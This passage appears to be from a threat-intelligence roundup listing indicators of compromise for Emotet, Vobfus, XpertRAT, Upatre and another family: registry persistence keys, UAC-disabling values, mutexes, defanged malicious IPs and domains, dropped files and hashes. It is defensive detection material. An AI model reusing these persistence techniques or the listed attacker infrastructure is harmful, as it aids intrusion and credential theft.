\n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BYTEDOWNLOAD PROTECT SERVICE \nValue Name: Start ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BYTEDOWNLOAD PROTECT SERVICE \nValue Name: ErrorControl ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BYTEDOWNLOAD PROTECT SERVICE \nValue Name: DisplayName ` | 9 \nMutexes | Occurrences \n---|--- \n`d19ab989-a35f-4710-83df-7b2db7efe7c5{846ee340-7039-11de-9d20-806e6f6e6963}` | 10 \n`A16467FA7-343A2EC6-F2351354-B9A74ACF-1DC8406A` | 10 \n`Global\\<random guid>` | 10 
\n`01B1CA98-EE2E-41B3-8A2F-F319643109E5` | 2 \n`None` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`216[.]83[.]52[.]40` | 20 \n`103[.]91[.]210[.]187` | 11 \n`45[.]139[.]236[.]14` | 10 \n`23[.]106[.]124[.]148` | 10 \n`45[.]76[.]18[.]39` | 9 \n`37[.]140[.]192[.]153` | 9 \n`104[.]27[.]185[.]71` | 7 \n`185[.]99[.]133[.]121` | 6 \n`37[.]140[.]192[.]166` | 6 \n`88[.]99[.]66[.]31` | 5 \n`13[.]107[.]21[.]200` | 4 \n`93[.]190[.]142[.]79` | 3 \n`208[.]95[.]112[.]1` | 3 \n`209[.]141[.]34[.]150` | 3 \n`216[.]83[.]52[.]19` | 3 \n`104[.]27[.]184[.]71` | 3 \n`183[.]131[.]207[.]66` | 2 \n`216[.]83[.]52[.]20` | 2 \n`204[.]79[.]197[.]200` | 1 \n`220[.]243[.]236[.]20` | 1 \n`220[.]242[.]158[.]12` | 1 \n`104[.]28[.]10[.]3` | 1 \n`204[.]188[.]226[.]98` | 1 \n`104[.]27[.]171[.]106` | 1 \n`194[.]36[.]188[.]13` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`iplogger[.]org` | 10 \n`silvergeoa[.]com` | 10 \n`area[.]cyp360[.]com` | 10 \n`installsilver[.]com` | 9 \n`confirmssystems[.]com` | 9 \n`passwordkernel[.]online` | 9 \n`123321123[.]fun` | 6 \n`scp46[.]hosting[.]reg[.]ru` | 4 \n`ip-api[.]com` | 3 \n`myprintscreen[.]com` | 3 \n`fbinstall[.]cyp360[.]com` | 3 \n`ok` | 2 \n`js[.]users[.]51[.]la` | 2 \n`ia[.]51[.]la` | 2 \n`budison-oklarly[.]com` | 2 \n`ac[.]681776[.]com` | 2 \n`yip[.]su` | 1 \n`megagemes[.]info` | 1 \n`termscenter[.]com` | 1 \n`cleand8yv0m6g[.]top` | 1 \n`newbook-t[.]info` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`\\TEMP\\d` | 20 \n`\\TEMP\\d-shm` | 20 \n`\\TEMP\\d-wal` | 20 \n`%TEMP%\\~atmp` | 11 \n`%ProgramData%` | 10 \n`%TEMP%\\$inst` | 10 \n`%TEMP%\\$inst\\2.tmp` | 10 \n`%TEMP%\\$inst\\temp_0.tmp` | 10 \n`\\TEMP\\config.ini` | 10 \n`%ProgramFiles(x86)%\\wotsuper` | 10 \n`%ProgramFiles(x86)%\\wotsuper\\wotsuper` | 10 \n`%ProgramFiles(x86)%\\wotsuper\\wotsuper\\Uninstall.exe` | 10 \n`%ProgramFiles(x86)%\\wotsuper\\wotsuper\\Uninstall.ini` | 10 
\n`%ProgramFiles(x86)%\\wotsuper\\wotsuper\\wotsuper.exe` | 10 \n`%ProgramFiles(x86)%\\wotsuper\\wotsuper\\wotsuper1.exe` | 10 \n`%SystemRoot%\\wotsuper.reg` | 10 \n`%ProgramData%\\freebl3.dll` | 9 \n`%ProgramData%\\mozglue.dll` | 9 \n`%SystemRoot%\\SysWOW64\\config.ini` | 9 \n`%APPDATA%\\Mozilla\\Firefox\\Profiles\\1LCUQ8~1.DEF\\cookies.sqlite-shm` | 9 \n`%APPDATA%\\Mozilla\\Firefox\\Profiles\\1LCUQ8~1.DEF\\cookies.sqlite-wal` | 9 \n`%ProgramData%\\msvcp140.dll` | 8 \n`%ProgramData%\\nss3.dll` | 6 \n`%HOMEPATH%\\pwordkrn.exe` | 6 \n`%ProgramData%\\softokn3.dll` | 5 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0034790f990238fe8e57d28800a8498bce5bdf3604cc56fc670ac5d65c6e5e08 249de6212474007cb9cf42a68939fae2f769f2097a57afa664a4780b2641228e 275eb1700ac5dbe3b62ce16a06409c4866728f72ee9e5c10f43beba094038475 48ab169b253421d2ece727161c6ff26c47836d5905fa685812010c6de4b75b27 681297a82e85822a1cb5a58296a515151f417bb8aafe5d4505d2219b4fe61438 70576eb8cd35093b1ef56da7fb39bf88f32c57f410484d613b5028cecbb1b0df 743238d01b2f968044ee2b175c61574aca518874c67201146f19df5a53c3b0d2 7e71eda28ecca392d6e86a9004c3bd38c7cbdf79399e90742feac5fa066aba66 a6abe3b046e8bdcfb33fa9776195fbb89a3e4218f6bb281aedd15f28fe1f4818 bad303ab4b68379128469e3be92d5bf3b23ec7bb285a260b1fadeead3fe43bbf bc55f494359805cc4d89f6812c3a1a14d593d9ead82267dcae7029dcbddebcab be2201940b246ae89cae4f6d0a691a1092289868230f1da85f9142d180709744 c66fe1a34cbe3a966ecbd1beb87b425e004a4a21f38bd483c2c10ef7c77e5e0b c8a3cb15adb8639ceaa0092b3a7f69f362cb48bcd96ffd18d362a38a1fbfff41 d39e3e47d12347b27f81a75751145bf6915b6a12caffa2dc4b0981666339c3bb e0b5780569ee0983401f373b03909ba27babc52c258eb150939e0b9d337de594 eaa8bbd1fee19574eeed935d8756223876c64d3ca49b372c04b98b6912108586 f34e64f4e7be7e6b2c665700ec513b4783e570a4de2087ac9511f152d812b2f5 f4b4158338fe30016fb7034b70bc3babcee3be21ea5c214451d83e3cb31233d8 fdbad2f7d47f6b60b5eb5a7110c150bc89932fdf47d224a4e31d8f091ee8dc58 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  
\nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-okD3nsZ3jwI/XitOphUI3PI/AAAAAAAADKs/Git5ndVq3H02WOrg61YQTOjzMBf_dk4OQCLcBGAsYHQ/s1600/fdbad2f7d47f6b60b5eb5a7110c150bc89932fdf47d224a4e31d8f091ee8dc58_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Doc.Malware.Emotet-7544675-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: Type ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: Start ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ErrorControl ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ImagePath ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: DisplayName ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: WOW64 ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ObjectName ` | 7 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 7 \n`Global\\M98B68E3C` | 7 \n`Global\\Nx534F51BC` | 1 \nIP Addresses contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`190[.]17[.]44[.]48` | 7 \n`70[.]123[.]95[.]180` | 7 \n`74[.]220[.]194[.]30` | 7 \n`59[.]120[.]5[.]154` | 3 \n`100[.]66[.]142[.]61` | 3 \n`100[.]108[.]145[.]200` | 3 \n`100[.]87[.]27[.]180` | 3 \n`100[.]83[.]251[.]131` | 3 \n`100[.]90[.]84[.]106` | 3 \n`17[.]36[.]205[.]74` | 2 \n`74[.]202[.]142[.]71` | 2 \n`24[.]232[.]0[.]227` | 2 \n`200[.]45[.]191[.]16` | 2 \n`74[.]202[.]142[.]98/31` | 2 \n`51[.]77[.]113[.]100` | 2 \n`98[.]103[.]188[.]70` | 1 \n`200[.]107[.]202[.]33` | 1 \n`67[.]212[.]168[.]237` | 1 \n`85[.]115[.]130[.]101` | 1 \n`206[.]126[.]59[.]246` | 1 \n`162[.]211[.]85[.]171` | 1 \n`80[.]93[.]143[.]50` | 1 \n`203[.]130[.]9[.]8` | 1 \n`192[.]185[.]21[.]150` | 1 \n`192[.]185[.]2[.]205` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`jayracing[.]com` | 10 \n`rcmgdev44[.]xyz` | 3 \n`demu[.]hu` | 3 \n`itconsortium[.]net` | 3 \n`josemoo[.]com` | 3 \n`smtp[.]prodigy[.]net[.]mx` | 2 \n`smtp[.]fibertel[.]com[.]ar` | 2 \n`smtp[.]infinitummail[.]com` | 2 \n`smtp[.]arnet[.]com[.]ar` | 2 \n`smtp[.]dsl[.]telkomsa[.]net` | 2 \n`mail[.]1and1[.]com` | 1 \n`smtp[.]tcc-la[.]com` | 1 \n`smtp[.]indisa[.]cl` | 1 \n`mail[.]cemcol[.]hn` | 1 \n`mail[.]cobico[.]co` | 1 \n`cowealth[.]com[.]tw` | 1 \n`mail[.]an-car[.]it` | 1 \n`mail[.]argo[.]ge` | 1 \n`smtp[.]1und[.]de` | 1 \n`mail[.]fracma[.]co` | 1 \n`mail[.]castel[.]ge` | 1 \n`smtpvip[.]reis[.]mx` | 1 \n`mail[.]stscambodia[.]com` | 1 \n`smtp[.]netvoice[.]com[.]ph` | 1 \n`mail[.]mygrande[.]net` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\229.exe` | 10 \n \n#### File Hashes\n\n` 0c9ef55223b45ef57ef38a98bbb1675f4bb284af6a56f9157e4c86b864360719 412e213dd241031a172b48a422bbcf8e3e0b45e89a984fc45028fa96299f459a 42e61e25f4b3d2b57fa973344417602c6e43537eeef6f7fdf32f9d34bf8f3604 6c4c28356c53832f5ab0a5acc2a14f4f907188655dd315bf1e18581c4c48337e 
70dc1946d77ef19522ccc9d18629e8777283a715d3fa055ff7f0559331db3e26 81c603712c753de8200c0cb6dd28d6b37ac2873b968bdf8929ca129d35195d4a ac2b7c9be4cf9cf5b2e4a564a5fa312243e665dd31463448c975f38664de56f2 ca1e6ff31df37242aa2e09a4cb29b7546dd408c0b0de26dd2a946183eea64b95 d676ecd3750ce75f42ed0c6958863e01ffbf92b5169c1899513b0affc952b9de dfe5f28fde5c483ba38aff7def0df3938ae4837acb81cba696f57159fa6fa0b6 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-gV0Kg_wsci0/XitO7DAGmCI/AAAAAAAADK4/3Bom7M6r2bUku4gUhx64U6HUOjRzwII8wCLcBGAsYHQ/s1600/ac2b7c9be4cf9cf5b2e4a564a5fa312243e665dd31463448c975f38664de56f2_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-NaI3QAoenqI/XitO_Iz5IVI/AAAAAAAADK8/UYM3l_MHlbgV-BpasI6bQorRu1zC3S6swCLcBGAsYHQ/s1600/ac2b7c9be4cf9cf5b2e4a564a5fa312243e665dd31463448c975f38664de56f2_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-FsJjlnWcGqE/XitPEf3ivLI/AAAAAAAADLA/zKf79XkTJeE2rLbSMz60SumpCzd2b2MaACLcBGAsYHQ/s1600/ac2b7c9be4cf9cf5b2e4a564a5fa312243e665dd31463448c975f38664de56f2_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Worm.Vobfus-7541859-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 12 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: WindowsDefender ` | 7 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: WindowsDefender ` | 7 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: WindowsDefender ` | 7 
\n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: WindowsDefender ` | 7 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: update ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: update ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: update ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: update ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: BWOJ39VGEPRBJ ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: BWOJ39VGEPRBJ ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: BWOJ39VGEPRBJ ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: BWOJ39VGEPRBJ ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: IOAUWN4A3W4AA ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: IOAUWN4A3W4AA ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: IOAUWN4A3W4AA ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: IOAUWN4A3W4AA ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 8L9ROXIFMECH6 ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 8L9ROXIFMECH6 ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: 8L9ROXIFMECH6 ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: 8L9ROXIFMECH6 ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: HE8MRP3X92SVO ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue 
Name: HE8MRP3X92SVO ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: HE8MRP3X92SVO ` | 1 \nMutexes | Occurrences \n---|--- \n`<random, matching [a-zA-Z0-9]{5,9}>` | 7 \n`HCQZLMB9VOLD` | 1 \n`1HZYRMUIRQ` | 1 \n`REYUIW9NA8LY` | 1 \n`bv1lr78956835` | 1 \n`MUA192KRR0N` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`172[.]217[.]11[.]46` | 2 \n`172[.]217[.]9[.]206` | 2 \n`188[.]138[.]114[.]61` | 1 \n`178[.]128[.]111[.]183` | 1 \n`77[.]79[.]13[.]204` | 1 \n`195[.]201[.]196[.]115` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]altervista[.]org` | 1 \n`divine-vps[.]com` | 1 \n`moddersondazone[.]net` | 1 \n`khant[.]info` | 1 \n`applesupportforums[.]com` | 1 \n`underground-logs[.]tk` | 1 \n`www[.]emmek[.]altervista[.]org` | 1 \n`khant[.]me` | 1 \n`imscuh[.]com` | 1 \n`rtrforums[.]com` | 1 \n`tripsschool[.]netfirms[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\windefender.exe.jpg` | 6 \n`%TEMP%\\update.exe.jpg` | 1 \n`%TEMP%\\8c5gucto.exe.jpg` | 1 \n`%TEMP%\\f5qrnr2jfk.exe.jpg` | 1 \n`%TEMP%\\52qof1hoy2.exe.jpg` | 1 \n`%TEMP%\\dvpiit26.exe.jpg` | 1 \n`%TEMP%\\windefender.jpg` | 1 \n \n#### File Hashes\n\n` 171ab79cd58e2be6aeada2c137c8ab74eecf082ae2a80358e84fccd254bf760b 312b904aa6b90418558a7e9b8d25ad1f84a2ae413e542fb6a06b7aae9567957d 39154850d888f42f4a04fc19887691101aadda306311605b59aa0997ae9fd4cc 3bd1ed52b57837cbc2b072c23f9de501a7d0ed5bd3ce93d3ca7022aada5ea13f 4ca9d8cd2b950485301fb885cc1d954e7c91c03c4fd21209fe90d68426a0b073 594e3dde160ff061cabb630e7c6d8c9584e45f61bc446b03e3546d2104b25d1a 59656eb7ffde7b461f49735aa9717ab09ff883780522afa1de8d724928108b75 80f8410a8f0042edad98dc1636d6cbd6c989d5159454d86fc212eb647d413850 87a2371dc38ca7b11010496c3e4c908379596ddbd5b2eb0332817a8d18e71ea0 a92e67a93899f548c68b5d667650b0749a7ff56799ba7afd5d393bef97f946a5 
e487727b0d5121e8efc6f51ffe24ce54e40f923b0d9916284b988efc4a57269e eb03d095df6d765469d088cefbd320b6cee40bc97cf1bd75ad46a115f2d3697b `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-i4w2NhZknaE/XitPRG7gQtI/AAAAAAAADLM/j-LXoTebdAQevwuPUoO_eYjqiHOPYOz-ACLcBGAsYHQ/s1600/a92e67a93899f548c68b5d667650b0749a7ff56799ba7afd5d393bef97f946a5_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.XpertRAT-7550253-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: EnableLUA ` | 13 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: UACDisableNotify ` | 13 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\X ` | 13 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 13 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5 ` | 13 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5 ` | 13 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5 ` | 13 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\X\\RUN ` | 13 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\X\\RUN \nValue Name: NOME ` | 13 \nMutexes | Occurrences \n---|--- \n`P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5` | 13 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`joeing[.]dnsfor[.]me` | 13 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\Administrator.bmp` | 13 \n`%APPDATA%\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5` | 13 \n`%APPDATA%\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5` | 13 \n`%APPDATA%\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5.exe` | 13 \n`%APPDATA%\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5\\ut` | 13 \n`%TEMP%\\Westminster8.exe` | 13 \n \n#### File Hashes\n\n` 2bc7aa28fb4cab2aa55e683fa452125a29fdeaf2c8a8ad09801581ac164f6e04 33151408dca938762e705906a4da851f01d38e05ea539bc4a6b56745d1464933 3464a96f3efe37c2c852c581576c75b5f7fce51e06473317e3a927867959cd9e 395a63b07a1275522ed8867d6402abba3b81bfcafedfdd4cc42d9d7b12b03868 45df177c92177a1766adb8e57b49b588f80d5534a84f0fc91d3ce296c7793052 75dc81fe9a84e7abecc35834a59574fa6975df9dafede10ec32090c054b2a7e4 8cd515edb041f9591d71885cf5e51253f9c0569fcfae06a73e14dbfef7d6f5ef 964354f86010cf35a07fc0e8ac11c0e653409338c42cfc132d8876b0fc64d3e7 a78e29a18072a0287261c696aac850b3a2f67087e1167f7b867eff84075655ab ab4e72ae86ecc5ec5fd7fe5e727ebc069c4803fd34e975c6054fa85cf4a73f8a af2f58c80a13d01953ff089503666772bbafa371fe61eadd8561aca0026ff856 ce56803cae1069908fc47087d6d8fbd1278ae72bc36966694e35da564822446e dc5771d054a00e41f0cceb59ab59bf154b5e56d6fbff9db7a2713a5728254bbb `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-Fd5X3JcT4pA/XitPhSd5vRI/AAAAAAAADLY/9a9jN4DUEqUNsyPZh3UMuLH3JbNgJD9JgCLcBGAsYHQ/s1600/af2f58c80a13d01953ff089503666772bbafa371fe61eadd8561aca0026ff856_amp.png>)\n\n \n\n\n#### 
ThreatGrid\n\n[](<https://1.bp.blogspot.com/-VWcRyD5neiQ/XitPlU8bQFI/AAAAAAAADLc/24DqGS6JuB8sBCmQvZHVodc-25GmClNOQCLcBGAsYHQ/s1600/af2f58c80a13d01953ff089503666772bbafa371fe61eadd8561aca0026ff856_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.Upatre-7549404-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: a2fc9eb ` | 8 \nMutexes | Occurrences \n---|--- \n`qazwsxedc` | 9 \n`Local\\MSCTF.Asm.Mutexsssssssssssss1` | 8 \n`Local\\MSCTF.CtfMonitorInstMutexsssssssssssss1` | 8 \n`Global\\b54c4621-3b1b-11ea-a007-00501e3ae7b5` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`93[.]118[.]36[.]235` | 8 \n`197[.]255[.]147[.]146` | 8 \n`136[.]243[.]69[.]220` | 8 \n`81[.]169[.]145[.]67` | 8 \n`178[.]254[.]50[.]156` | 8 \n`202[.]172[.]26[.]26` | 8 \n`134[.]0[.]11[.]125` | 8 \n`157[.]7[.]107[.]174` | 8 \n`213[.]186[.]33[.]3` | 7 \n`46[.]105[.]57[.]169` | 7 \n`166[.]62[.]113[.]120` | 7 \n`46[.]30[.]215[.]33` | 7 \n`212[.]48[.]68[.]63` | 7 \n`208[.]117[.]38[.]143` | 7 \n`5[.]39[.]73[.]158` | 7 \n`3[.]114[.]58[.]184` | 6 \n`37[.]58[.]63[.]231` | 6 \n`81[.]19[.]159[.]64` | 6 \n`198[.]199[.]67[.]86` | 6 \n`185[.]227[.]80[.]58` | 6 \n`211[.]1[.]226[.]76` | 3 \n`192[.]35[.]177[.]64` | 2 \n`203[.]189[.]109[.]240` | 2 \n`213[.]186[.]33[.]87` | 1 \n`46[.]166[.]187[.]64` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`schema[.]org` | 8 \n`api[.]w[.]org` | 8 \n`gmpg[.]org` | 8 \n`recaswine[.]ro` | 8 \n`pendletonforhouse[.]com` | 8 \n`ecocalsots[.]com` | 8 \n`www[.]riesa[.]de` | 8 \n`gestes-argile[.]com` | 8 \n`feuerwehr-stadt-riesa[.]de` | 8 \n`treatneuro[.]com` | 8 \n`national-drafting[.]com` | 8 \n`dupdiesel[.]co[.]za` | 8 \n`has-gulvakfi[.]com` | 8 \n`domaine-cassillac[.]com` | 8 \n`cerenalarmkamera[.]com` | 8 \n`definitionen[.]de` | 8 \n`eatside[.]es` | 8 \n`takatei[.]com` | 8 \n`www[.]takatei[.]com` | 8 \n`themeisle[.]com` | 7 \n`www[.]ovh[.]co[.]uk` | 7 \n`plexipr[.]com` | 7 \n`paintituppottery[.]com` | 7 \n`viralcrazies[.]com` | 7 \n`camlavabolari[.]com` | 7 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\Start Menu\\Programs\\Startupx\\system.pif` | 8 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startupx\\system.pif` | 8 \n`%APPDATA%\\a2fc9eb` | 8 \n`%APPDATA%\\a2fc9eb\\ea2fc9.exe` | 8 \n`%APPDATA%\\8ddb21f\\88ddb2.exe` | 5 \n`%HOMEPATH%\\HELP_FILE_430D48DC3.png` | 1 \n`%HOMEPATH%\\HELP_FILE_530D48DC3.html` | 1 \n`%HOMEPATH%\\HELP_FILE_530D48DC3.png` | 1 \n`%HOMEPATH%\\HELP_FILE_630D48DC3.html` | 1 \n`%HOMEPATH%\\HELP_FILE_630D48DC3.png` | 1 \n`%HOMEPATH%\\HELP_FILE_730D48DC3.html` | 1 \n`%HOMEPATH%\\HELP_FILE_730D48DC3.png` | 1 \n`%HOMEPATH%\\HELP_FILE_830D48DC3.html` | 1 \n`%HOMEPATH%\\HELP_FILE_830D48DC3.png` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_130D48DC3.html` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_130D48DC3.png` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_230D48DC3.html` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_230D48DC3.png` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_330D48DC3.html` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_330D48DC3.png` | 1 \n`%HOMEPATH%\\Local Settings\\Application 
